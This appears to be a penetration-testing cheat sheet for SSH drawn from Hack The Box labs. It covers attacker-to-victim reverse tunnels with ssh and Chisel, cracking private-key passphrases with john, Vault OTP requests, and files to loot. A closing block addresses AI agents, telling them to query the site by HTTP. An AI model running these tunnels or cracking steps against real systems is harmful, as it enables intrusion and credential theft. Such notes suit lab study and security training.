# 22 - SSH ### Banner Grabbing ```bash $ nc -vn 22 ``` ### Generate SSH Key ```bash $ ssh-keygen -t rsa -b 4096 -f matt-id_rsa ``` ### No Matching Key Exchange ```bash $ ssh root@beep.htb Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 $ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 root@beep.htb ``` ### SSH Tunneling ```bash // Remote tunnel from victim, enum victim port 5432 (postgresql) ssh -N -f -R 5432:localhost:5432 p3@10.10.14.10 // Local tunnel from attacker, enum victim port 8002 ssh -N -f -L 8002:localhost:8002 hflaccus@carpediem.htb ssh -N -f -L 3306:localhost:3306 charlie@extension.htb -i id_rsa ## Using Chisel to enumerate local webservices on remote host // Chisel Server (attacker host) $ ./chisel_1.7.7_linux_amd64 server -p 4444 -reverse // Chisel Client (victim host) $ ./chisel_1.7.7_linux_amd64 client 10.10.14.5:4444 R:8080:127.0.0.1:8080 ## Using Chisel to setup a tunnel from compromized docker container to proxy ## traffic toward docker host (172.17.0.1:3000). // Chisel Server (attacker host) $ ./chisel_1.7.7_linux_amd64 server -p 3333 -reverse // Chisel Client (victim docker) ./chisel_1.7.7_linux_amd64 client 10.10.15.17:3333 R:127.0.0.1:3000:172.17.0.1:3000 ``` ### Brute Force id\_rsa ```bash // Convert id_rsa (.pem) to hash with ssh2john, and crack with john. $ ssh2john.py id_rsa > id_rsa.hash $ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt ``` ### Vault SSH OTP Vault is used to provice one-time passwords (OTP) for SSH logins. To request a OTP you need to know the *role* example `ssh/creds/otp_key_role`, the role is found in **secrets.sh**. ```bash $ vault write ssh/creds/root_otp ip=10.10.10.110 Key Value --- ----- lease_id ssh/creds/root_otp/bdbe45d6-24b0-6a02-8534-d37bbb3f54c5 lease_duration 768h lease_renewable false ip 10.10.10.110 key 1762e6a1-f975-61f8-814e-f7d65a2a1f51 key_type otp port 22 username root ``` ### Interesing Files ```bash ssh_config sshd_config authorized_keys ssh_known_hosts known_hosts id_rsa ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xpthree.gitbook.io/notes/network-services/ports/22-ssh.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.